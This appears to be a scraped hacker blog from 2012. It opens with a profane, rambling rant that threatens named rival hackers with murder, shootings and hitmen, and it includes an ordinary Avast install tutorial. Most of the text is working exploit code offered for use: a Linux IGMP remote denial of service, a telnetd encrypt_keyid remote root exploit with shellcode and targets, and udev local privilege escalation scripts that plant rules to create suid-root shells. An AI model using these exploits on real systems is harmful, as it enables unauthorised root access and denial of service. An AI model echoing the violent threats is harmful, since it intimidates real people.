[NEWS]: Sabu/storm/crew ,are fucking dd0s skiddies! nothing BUT it! DONOT B SCARED OF THEM!

Posted on 27th January 2012 in Papers, Uncategorized

Hello WORLD and the news here in my areas… it seems what you wanted will finally happen, the first ever
ONLINE MURDER OF A HUMAN.
i will be leaving shortly for a 10year+ stretch for conspiracy to it, so i guess thisd is also a goodbye of some ssorts, but, fear nothing, it is only another 12 yrs or so, wich at that stage these kids will not really be able to walk well, if that atall :P

I will mention this… because i am JUSTiCE and will bring this, swiftly, in the night, n the sleep, of these people named…. it will be nothing but, blood on my hands, nfortunately for them, is only to me, another body i have watched die thru them…big fucking deal.. now this came thru these fuckwads, doing nothing it seems but ddos and ddos.overkill, and yes, i did admire them before i realised HOW theyre “hacking” , to use the skills of others…basically, whilst they ddos you on port 443, if you run https, this will “look” like you owned, and prettymuch have been…. so, i guess, do not run https nowdays unless ya know your shit :)

Unfortuanetly, is time for this ghrop of kids to go, as they offer nothing but *war* , it seems this is through and through and, as always…. a snippet of the attacks on me, overkilling mgood peoples pcs, just for ‘lols’, really, is this a professional group >???
#haxnet @ efnet.org , enjoy…
my true brothers, know WHO they are…

xxxx: we mudered every server xd touched last nite
xxxx: well sabu did
xxxx: i just watched and lol’d
xxxx: it was soo bad that xd paid 20$ to call me on my cell
xxxx: to say sorry and asked me to make it stop
friends: why dont you just leave it alone?
xxxx: its all done
xxxx: im not the one who did it
xxxx: and i didnt ask for it
xxxx: he just said hey watch this

I do believe xxxx: , and this is how Sab u , works :)
now, maybe you older people who are actually fking scared of this skiddy, well here, wannabe is written everywhere :P

Sabu_ is ~Sabu@phalse.2600.com * beg my pardon
Sabu_ on #hwa-security @#haxnet @+# #2600 @+#malicious @#OccupyIRC @#hacked @+#newyork +#security +#hackers
Sabu_ using irc.Prison.NET Prisoners of the Internet…
Sabu_ End of /WHOIS list.

storm_ is voodoo@vortex.dev-1.dhcp.net * * I’m too lame to read BitchX.doc *
storm_ on @#juped @#irish #geek @#hacked @#addict @#hipster @#phear @#syn @# @#overdose @#evil @#jupiter @#malicious
storm_ using irc.efnet.nl We worship Optimus Prime
storm_ is away: is away: (Auto-Away after 10 mins) [BX-MsgLog On]
storm_ End of /WHOIS list.
-

Says it all really…. and i aint touched anything this, is really the real, *crew* of this fuckwit :)
Theyrer still going to.. hehe, hitting a box setup to collect theyre ircds basically, this i was taught, by special person called mouse_ ,who is my love and my life…and, love ya baby.

Now… goto your local fucking whatevers, and,, the ppl with big $$$ who can pay hitmen etc, do NOT hesitate , for they will be, in deeper trouble than that + ddos + jail :)
I can only say for now, stay tuned, it will soon showup, every country, everywhere..how this *grou[p* rolls…. i am just, trying to give some support to those, who think they have been at mercy ofwannabe thugs…
i am 35+ years old, and have better things to *war* and am also, la casa.
I was born into it, so i CAN say these words… and i CAN promise death… it is nothing, 3+ and growing,
Respect for fallen brothers in arms _T , my friend you MUST stop the grog . but i love ya!
Talon and rotor ,also, are brothers i wish would give up this evil damn drug, i tried it 2 nights ago, to ‘remember’ the drunken feeling and, guess what this is how this shitst0rm has started :P hehehe… it is ok but now..
I will only say that, stay strong and beleive these words..
I dont play kids games and was forced into it by someone who i still do respect as he has shown restarint in wartime…

As for MY damn arse,
why do people sometimes come axcross the characters like this, is easy, we were born to act, and act swiftly, it is nothing but my blood, as i am IT citizen, not AU.
I have been inside HARD jail, HM Pentidge 8years to it, so am i going to let sme 16yr old w****s, annoy me !
Are YOU?
Having a blackbelt+ in MMA , may also have, sumthin todo with it :)

OH and I agree with the anti riaa etc, and anti sopa, they will fucking be wors than any crew, but, ddos, will OT solve it,. usa government, is alll fucking over it, it is done.. these idiots, should hack maybe, and not rely on , a nice younger girl, or others, to code theyre ‘tools’
Maybe, they should learn to a. use mutiple operating systems, and also maybe, know what theyre *tools* actually do…
i once asked storm, for his ‘ipv6 ddos.c’ wich was pvt, err did i say pvt, i meant, was a rip of ip6tunneldos.c ,and ipv6fuck.c ,he was actually angry because i asked for it, and this as like 1year ago… now let us see who has the longest memorys ;)
Go ahead and has it, it is setup for you, and was from the start setup for people of this calibre… to repeatedly overkill anyone of anything, will do nothing.

As once, someome VERY wise told me
“ddos only brings one thing…” , i took this, as more of a warning, and my respect now for this person, is igher than most others… because he showed me the truth to the errors people make Online.
Would you like done offline to your face, and could that guy even do shit to you offline ??

I doubt it, or else they would not be so darn loud on it.
Now you faghgots, i left a special password on a special pc, specially for these special people. It was no honeypot but, was just setup specially for this, and even has automated special features wich do things, specially on attack, i also left those scripts in ~./ for them to see, so, it is no damn wonder these reatrded mongoloidos, are nothing and will never be anything, until the losses are cut.. is simple.

the idiots bite… kekeke… it is going to be nothing but blood.. on hands… and, then i dont ‘lol’…rather, i pack your body into a desert, and, walk away crying… as, it is still taking life, of wich i hate tod… this one however, only regarded Uno telefonica al italia… e FATTO’.
For all the other Italians out there, dont ever underestimate yourself as i did my whole life… your power, is BRED into you it is only the nicety of character, wich is keeping you from attacking and i do know this my brothers….
La casa, e veramente nostra ….

Now, your kids who were all braggart online can enjoy the tastes of divine intervention OFFline where, there is no ezine to make you look great, but there is a shotgun of 100, or .44, your choice sir :) i can ask but, that would be foolish of me, so i will let you count the pellets put into the left knee of 2 people, one is in Usa and sabu .
You both, have committed suicide… I come from a long line of mafia bred italians, i dont think we are scared, atall, nor ever have been… we are for REAL, and bring the internet to ANY bully who does this, in ANY country.. just remember in America, who did stuff the Ballot boxes for half of your presidents ;)
go find out who… is quite.. interesting how was done, i mean, you must kow howmany people are in one place, it cannot be so hard to realise for every one person it was 100 people being voted :)

comments: 0 » tags:

[TUTE]: Avast Antivirus Home Edition on PCLinuxOS 2011.6 (July/8/2011)

Posted on 19th January 2012 in Papers

Avast Antivirus Home Edition on PCLinuxOS 2011.6 // July 8th, 2011 // by Andy
Enjoy this awesome tute! yea yea, so i did not bother to put pics in, sowhat .. it is simple, you just follow this and, its done! you need apt-get/apt ,and wget, and rpm manager,wich should be all there for Debian and Ubuntu so, i should make this really called for LINUX OS! Also for centos, you COULD try using yum install, or simply copy install.. it should work on many distros that can handle rpm anyhow.. id avoid bsd tho atm…well, just atm…Enjoy the tute!

Yes yes yes… I know… Linux does not needs antivirus software. True. BUT then – if You are dualbooting with Windows You may want to be able to check the other OS once in a while… Rootkits / malware / spyware / rougeware / viruses and so on and so forth… Even if You are not dualbooting another way of using this would be to use Your remaster to check Your computers at home that are using Windows from the LiveCD / LiveDVD level… Seems useful right? You can access the Windows partitions with read / write permissions under Your PCLinuxOS.
Nastiness cannot hide itself from the antivirus with few entries in the registry… Sounds really good… So how does one installs Avast on the PCLinuxOS…
First we need to download a copy of it (it’s legal if You are using it at home on a non-commercial machines. For more info read the Terms and Conditions).

Open konsole and issue this command:
wget -c http://files.avast.com/files/linux/avast4workstation-1.3.0-1.i586.rpm
Now wait for it to finish downloading
Done right?

Now You need to gain root privileges. Issue those commands:
su

give a root’s password when asked.
Now for the installation part issue this command:

apt-get install avast4workstation-1.3.0-1.i586.rpm

and wait for it to finish.
Done?

Now issue those two commands:

echo '' >> /etc/rc.local
echo 'echo 128000000 >/proc/sys/kernel/shmmax' >> /etc/rc.local
Done?

Close the konsole window and go to Kmenu. Type in ava in the search box.
There You go – that’s Your avast.
Click in it. Registration box will pop-up.
Click on the “Click here to obtain registration key” link.
You can choose what browser do You want to use.
Fill out registration form correctly and wait for the e-mail from avast with Your product key.
Copy and paste the registration key into the Registration window and Ok it.
You have just installed Avast home edition for Linux workstations.
!DONE!

Close the avast window and reboot Your machine.
When it’s fully rebooted open Avast and upgrade / configure it to Your liking.

Upgraded and configured Avast Antivirus under PCLinuxOS 2011.6 KDE4

Avast does not have to be installed on KDE4.
It can be installed on any other DE available with PCLinuxOS.
If You want to You can scan the files from the command line… Type in avast --help
for more details and the command syntax.
Avast configuration files and viruses database are stored in the ~/.avast folder.
If the menu entry was not created and You are planning on creating Your own launcher use:
'avastgui' in the command box.

Icons are available here:
/usr/lib/avast4workstation/share/avast/icons/

GOOD STUFF!
Now your protected, so, set cron up and, your done!
XD

comments: 0 » tags:

[DoS]: Code of ‘Undead’ attack by KCOPE But,this seems to be REMOTE not just lan based GREAT for learning about DoS ,about Icmp/Igmp/Tcp/IP,packet sequences,and how little it takes to flaw one

Posted on 18th January 2012 in Codes, Exploits

Ill just put the str8 up crappy PoC up, wich was on fdlists right ,wrong, this can attack OUTSIDE the Lan or Wlan :P
So, use some thinkin maybe update this post with your OWN version for a change
Go hard… i will have a closer look when i have more time, but, i know that my exploit for windows, is setup similar fashion and this, is simply because of the way igmp and icmp membership bugs read things, so, it had to be at the least 0.0.0.0, localhost,would fail…as thats an ip… so, i guess, goodluck!
XD

/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
** THIS code wich can attack NOT just LAN, is NOT kcopes and, is based more on the ICMPv3 membership query bug... wich was for windows but also affects linux, in IMPv3 tho :P  go figure... anyhow, this can now be easily made into a very fast packet machine ,and since it doesnt care what the ips are, i guess could be seen results, remotely... feel free to update/send in comment... all comments, go thru ME, XD , before any type of publishing, so be sure that codes are safe and, i only put here, corrected codes...simple... so, please dont go adding it to your lame d0s collection coz, ill just fark it up , and, i mean, the packet is easy to block since it is released...right
XD loves u all
** Example:
** ./undeadattack SRC_IP DST_IP
** The Linux Kernel at the remote side will Panic
** when sent over the network -still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

struct iphdr {
  unsigned char ihl:4, version:4, tos;
  unsigned short tot_len, id, frag_off;
  unsigned char ttl, protocol;
  unsigned short check;
  unsigned int saddr, daddr;
  unsigned int options1;
  unsigned int options2;
};

struct igmp_query {
        unsigned char type;
        unsigned char maxresponse;
        unsigned short csum;
        unsigned int mcast;
        char padding[40];
};

// unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work

unsigned short in_chksum(unsigned short *addr, int len);         // this was crippled, notice that this was uptop, so you dd not see the
                                                                 // bugged up in_chksum wich wont make this works :)  NOW try it.
unsigned short in_chksum(unsigned short *addr, int len) {
   register int nleft = len;
   register int sum = 0;
   u_short answer = 0;
   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }
   if (nleft == 1) {
      *(u_char *)(&answer) = *(u_char *)addr;
      sum += answer;
   }
   sum = (sum >> 16) + (sum & 0xffff);
   sum += (sum >> 16);
   answer = ~sum;
   return(answer);
}

long resolve(char *);
long resolve(char *host) {
  struct hostent *hst;
  long addr;
  hst = gethostbyname(host);
  if (hst == NULL)
    return(-1);
  memcpy(&addr, hst->h_addr, hst->h_length);
  return(addr);
}

int main(int argc, char *argv[]) {
  struct sockaddr_in dst;
  struct iphdr *ip;
  struct igmp_query *igmp;
  long daddr, saddr;
  int s, i=0, c, len, one=1;
  char buf[1500];
  if (argc < 3) {
    printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
   "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
    printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not :P
    return(1);
  }
  daddr = resolve(argv[2]);
  saddr = resolve(argv[1]);
  memset(buf, 0, 1500);
  ip = (struct iphdr *)&buf;
  igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)];
  dst.sin_addr.s_addr = daddr;
  dst.sin_family = AF_INET;
  ip->ihl = 7;
  ip->version = 4;
  ip->tos = 0;
  ip->tot_len = htons(sizeof(struct iphdr)+8);
  ip->id = htons(18277);
  ip->frag_off=0;
  ip->ttl = 1;
  ip->protocol = IPPROTO_IGMP;
  ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
  ip->saddr = saddr;
  ip->daddr = daddr;
  ip->options1 = 0;
  ip->options2 = 0;
  igmp->type = 0x11;
  igmp->maxresponse = 0xff;
  igmp->mcast=inet_addr("0.0.0.0");  // mod here ,now we can attack the IP we actually put in
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 8);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  close(s);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  ip->id = htons(18278);
  ip->tot_len = sizeof(struct iphdr)+12;
  igmp->type = 0x11;
  igmp->maxresponse = 0;
  igmp->mcast=inet_addr("0.0.0.0");
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 12);
  printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  return(0);
}
comments: 0 » tags: ,

telnetd-encrypt_keyid.c with ~12 targets

Posted on 8th January 2012 in Exploits

The famous ‘targets’ copy i was apparently keeping from everyone… enjoy (with targets! and even addable targets!) !

/*
 *            telnetd-encrypt_keyid.c
 *  Mon Dec 26 20:37:05 CET 2011
 *  Copyright  2011  Jaime Penalba Estebanez (NighterMan)
 *  Copyright  2011  Gonzalo J. Carracedo (BatchDrake)
 *  nighterman@painsec.com - jpenalbae@gmail.com
 *  BatchDrake@painsec.com - BatchDrake@gmail.com
*/
/*
 * Usage:
 * $ gcc exploit.c -o exploit
 * $ ./exploit 127.0.0.1 23 1
 * [<] Succes reading intial server request 3 bytes
 * [>] Telnet initial encryption mode and IV sent
 * [<] Server response: 8 bytes read
 * [>] First payload to overwrite function pointer sent
 * [<] Server response: 6 bytes read
 * [>] Second payload to triger the function pointer
 * [*] got shell?
 * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
 * Most of the inetd impletantions have a connection limit per second
 * so you must chage this if you start getting errors reading responses
 *  - for 60 conex per min  900000
 *  - for 40 conex per min 1500000
 *  - for no limit 300000 should work
 */
#define BRUTE_TOUT 600000  // seems pretty fair on cpu ..
#define MAXKEYLEN 64-1

struct key_info {
  unsigned char keyid[MAXKEYLEN];
  unsigned char keylen[4];
  unsigned char dir[4];
  unsigned char modep[4];
  unsigned char getcrypt[4];
};
struct target_profile {
  uint32_t      skip;
  const char    *address;
  const char    *desc;
  const char    *shellcode;
};

/* Shellcode FreeBSD x86 */
const char s_bsd32[] =
   "\x31\xc0"                      // xor          %eax,%eax
   "\x50"                          // push         %eax
   "\xb0\x17"                      // mov          $0x17,%al
   "\x50"                          // push         %eax
   "\xcd\x80"                      // int          $0x80
   "\x50"                          // push         %eax
   "\x68\x6e\x2f\x73\x68"          // push         $0x68732f6e
   "\x68\x2f\x2f\x62\x69"          // push         $0x69622f2f
   "\x89\xe3"                      // mov          %esp,%ebx
   "\x50"                          // push         %eax
   "\x54"                          // push         %esp
   "\x53"                          // push         %ebx
   "\x50"                          // push         %eax
   "\xb0\x3b"                      // mov          $0x3b,%al
   "\xcd\x80";                     // int          $0x80

/* Shellcode Linux x86 */
const char s_linux32[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

/* Shellcode Linux sparc */
const char s_linuxsparc[] = "\x2d\x0b\xd8\x9a"  /* sethi %hi(0x2f626800), %l6 */
                            "\xac\x15\xa1\x6e"  /* or %l6, 0x16e, %l6         */
                            "\x2f\x0b\xdc\xda"  /* sethi %hi(0x2f736800), %l7 */
                            "\x90\x0b\x80\x0e"  /* and %sp, %sp, %o0          */
                            "\x92\x03\xa0\x08"  /* add %sp, 0x08, %o1         */
                            "\x94\x22\x80\x0a"  /* sub %o2, %o2, %o2          */
                            "\x9c\x03\xa0\x10"  /* add %sp, 0x10, %sp         */
                            "\xec\x3b\xbf\xf0"  /* std %l6, [ %sp + - 16 ]    */
                            "\xd0\x23\xbf\xf8"  /* st %o0, [ %sp + - 8 ]      */
                            "\xc0\x23\xbf\xfc"  /* clr [ %sp + -4 ]           */
                            "\x82\x10\x20\x3b"  /* mov 0x3b, %g1              */
                            "\x91\xd0\x20\x10"; /* ta 0x10                    */

/* Valid targets list */
struct target_profile targets[] = {
  {20, "\x00\x80\x05\x08", "Generic Linux i386 bruteforce", s_linux32},
  {20, "\x00\x80\x05\x08", "Generic BSD i386 bruteforce", s_bsd32},
  {20, "\x23\xcc\x05\x08", "Ubuntu GNU/Linux 10.04, Inetutils Server (i386)", s_linux32},
  {20, "\x12\xc9\x05\x08", "Ubuntu GNU/Linux 10.04, Heimdal Server (i386)", s_linux32},
  {20, "\xef\x56\x06\x08", "Debian GNU/Linux stable 6.0.3, Inetutils Server (i386)", s_linux32},
  {20, "\x56\x9a\x05\x08", "Debian GNU/Linux stable 6.0.3, Heimdal Server (i386)", s_linux32},
  {1,  "\x00\x03\xe7\x94", "Debian GNU/Linux stable 6.0.3 Inetutils (SPARC)", s_linuxsparc},
  {3,  "\x00\x03\x2e\x0c", "Debian GNU/Linux stable 6.0.3 Heimdal Server (SPARC)", s_linuxsparc},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.0 (i386)", s_bsd32},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.1 (i386)", s_bsd32},
  {20, "\xed\xee\x05\x08", "FreeBSD 8.2 (i386)", s_bsd32},
  {20, "\x02\xac\x05\x08", "NetBSD 5.1 (i386)", s_bsd32},
  {0, NULL, NULL, NULL}
};

/* Telnet commands */
static unsigned char tnet_init_enc[] =
        "\xff\xfa\x26\x00\x01\x01\x12\x13"
        "\x14\x15\x16\x17\x18\x19\xff\xf0";

static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07";
static unsigned char tnet_end_suboption[] = "\xff\xf0";

/* Check if the shellcode worked, slightly simpler than shell (int) */
static int checkmagic (int fd) {
  char got[32];
  if (write (fd, "echo foo\n", 9) < 0)
    return -1;
  if (read (fd, got, 32) <= 0)
    return -1;
  return -!strstr (got, "foo");
}

static void shell(int fd) {
    fd_set  fds;
    char    tmp[128];
    int n;
    /* check uid */
    write(fd, "id\n", 3);
    /* semi-interactive shell */
    for (;;) {
        FD_ZERO(&fds);
        FD_SET(fd, &fds);
        FD_SET(0, &fds);
        if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
            perror("select");
            break;
        }
        /* read from fd and write to stdout */
        if (FD_ISSET(fd, &fds)) {
            if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
                fprintf(stderr, "Goodbye..\n");
                break;
            }
            if (write(1, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
        /* read from stdin and write to fd */
        if (FD_ISSET(0, &fds)) {
            if ((n = read(0, tmp, sizeof(tmp))) < 0) {
                perror("read");
                break;
            }
            if (write(fd, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
    }
}

static int open_connection(in_addr_t dip, int dport) {
   int pconn;
   struct sockaddr_in cdata;
   struct timeval timeout;
   /* timeout.tv_sec  = _opts.timeout; */
   timeout.tv_sec  = 8;
   timeout.tv_usec = 0;
   /* Set socket options and create it */
   cdata.sin_addr.s_addr = dip;
   cdata.sin_port = htons(dport);
   cdata.sin_family = AF_INET;
   pconn = socket(AF_INET, SOCK_STREAM, 0);
   if(pconn < 0) {
   printf("Socket error: %i\n", pconn);
   printf("Err message: %s\n", strerror(errno));
   return (-1);
   }
   /* Set socket timeout */
   if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_RCVTIMEO: ");
   /* Set socket options */
   if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_SNDTIMEO: ");
   /* Make connection */
   if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0) {
   close(pconn);
   return -1;
   }
   return pconn;
}

static void usage(char *arg) {
    int x = 0;
    printf("Available Targets:\n\n");
    /* print tagets */
    while(targets[x].address != NULL) {
    printf("  %2i: %s\n", x + 1, targets[x].desc);
    x++;
    }
    printf("\n");
    printf("Telnetd encrypt_keyid exploit\n");
    printf("Usage: %s [IP] [Port] [Target]\n\n", arg);
}

int attack (const char *ip, unsigned int port,unsigned char *payload, unsigned int psize, int tryshell) {
  unsigned char readbuf[256];
  int ret;
  int conn;
  /* Open the connection */
  conn = open_connection(inet_addr(ip), port);
  if (conn == -1) {
  printf("[-] Error connecting: %i\n", errno);
  return -1;
  }
  /* Read initial server request */
  ret = read(conn, readbuf, 256);
  if (ret <= 0) {
  printf ("[!] Error receiving response: %s\n", ret ? strerror (errno) : "empty response");
  close (conn);
  return -1;
  }
  printf("[<] Success reading intial server request %i bytes ..\n", ret);
  /* printf("ATTACH DEBUGGER & PRESS KEY TO CONITNUE\n"); */
  /* ret = getchar(); */
  /* Send encryption and IV */
  ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));
  if (ret != sizeof(tnet_init_enc)) {
  printf("[-] Error sending init encryption: %i\n", ret);
  close (conn);
  return -1;
  }
  printf("[>] Telnet initial encryption mode and IV sent\n");
  /* Read response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response\n");
  close (conn);
  return -1;
  } else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the first payload with the overflow */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload first time\n");
  close (conn);
  return -1;
  }
  printf("[>] First payload to overwrite function pointer sent\n");
  /* Read Response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response ..\n");
  close (conn);
  return -1;
  }
  else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the payload again to tigger the function overwrite */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload second time ..\n");
  close (conn);
  return -1;
  }
  printf("[>] Second payload to trigger the function pointer ..\n");
  if (tryshell) {
  /* Start the semi interactive shell */
  printf("[*] Got root?\n");
  shell(conn);
  ret = 0;
  } else {
  printf ("[*] Does this work? ");
  /* Just check if it works */
  if (checkmagic (conn) == 0) {
  printf ("YES!\n");
  printf ("Add the Target address to the targets list & recomple!\n");
  ret = 0;
  } else {
  printf ("[-] Nope,try again ..\n");
  ret = -1;
  }
  }
  close (conn);
  return ret;
}

int main(int argc, char *argv[]) {
      int offset = 0;
      int target;
      int i;
      unsigned int address;
      /* Payload Size */
      int psize = (sizeof(struct key_info) +
      sizeof(tnet_option_enc_keyid) +
      sizeof(tnet_end_suboption));
      struct key_info bad_struct;
      unsigned char payload[psize];
      if (argc != 4) {
      usage(argv[0]);
      return -1;
      }
      /* Fill the structure */
      memset(&bad_struct, 0x90, sizeof(struct key_info));
      memcpy(bad_struct.keylen,   "DEAD", 4);
      memcpy(bad_struct.dir,      "BEEF", 4);
      target = atoi(argv[3]) - 1;
      /* Target selection */
      struct target_profile *t;
      t = &targets[target];
      printf("Target: %s\n\n", t->desc);
      for (i = 0; !i || target < 2; i++) {
      offset = 0;
      memcpy(&bad_struct.keyid[t->skip], t->shellcode, strlen(t->shellcode));
      memcpy (&address, t->address, 4);
      address += ((i + 1) >> 1) * (t->skip - 1) * (1 - ((i & 1) << 1));
      printf ("[*] Target address: 0x%04x\n", address);
      memcpy(bad_struct.modep, &address, 4); /* Readable address */
      memcpy(bad_struct.getcrypt, &address, 4); /* Function pointer */
      /* Prepare the payload with the overflow */
      memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));
      offset += sizeof(tnet_option_enc_keyid);
      memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));
      offset += sizeof(bad_struct);
      memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));
      if (attack (argv[1], atoi (argv[2]), payload, psize, target >= 2) == 0)
      break;
      usleep (BRUTE_TOUT);
    }
    return 0;
}

ENJOY! The ‘pvt’ socalled version ;)
XD

comments: 0 » tags: , ,

UDEV KERNEL EVENT Local priv escalations By Kcope and By UNKNOWN

Posted on 8th January 2012 in Exploits

UDEV Kcope bversion and the Undergroun bash version , have phunnnnnnn
XD / #HAXNET

#!/bin/sh
# Linux 2.6 Udev expl
# bug found by Sebastian Krahmer
# coded by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "REMOVE_CMD=/bin/bash -i") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
execl("/tmp/acc", "acc", (void*)0);
}

gcc ud.c -o /tmp/ud
cat > prog.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","/tmp/acc",NULL);
}
gcc -o prog.o -c prog.c -fPIC
gcc -shared -Wl,-soname,slib_ex.so.1 -o slib_ex.so.1.0 prog.o -nostartfiles

int main(void) {
setgid(0);
setuid(0);
execl("/bin/sh","/bin/sh",0);
}
gcc -o /tmp/acc acc.c
cp slib_ex.so.1.0 /tmp/slib_ex.so.1.0
/tmp/ud $1

And for the best version of all…

#!/bin/sh
# ubuntu 10.04 , 10.10 udev local root
if [ -z "$1" ]
then
echo "Usage: $0 <UDEV KERNEL EVENT>"
echo "See http://www.reactivated.net/writing_udev_rules.html"
exit
fi
cat > usn.sh << EOF
#!/bin/sh
chown root:root $PWD/usn
chmod +s $PWD/usn
EOF
cat > usn.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){
int *r;
*((int *)&r+2)=(int)s;
}
EOF
gcc usn.c -o usn
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn.sh
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat)"
echo "Once the conf is reloaded, just make the udev event happen : usn file will get suid-root"

Thats the Underground one wich is nice and neat,fast and furiouz :>
Enjoy them all, old now anyhow..
XD

comments: 0 » tags: ,

CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit (Alternate/cleaner than the kcope bash version)

Posted on 8th January 2012 in Exploits

YES! Amazingly, I do like SOME of Jonos code! Yes, when it is neater and, nicer than the alternatives ofcourse, but NOT when theyre crippled :) k thx. So, this is bein posted now, abit late but, better than never..

/*
 * CVE-2009-1185.c udev (rules) < 141 Local Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * Information:
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
 *   udev before 1.4.1 does not verify whether a NETLINK message originates
 *   from kernel space, which allows local users to gain privileges by sending
 *   a NETLINK message from user space.
 * Notes:
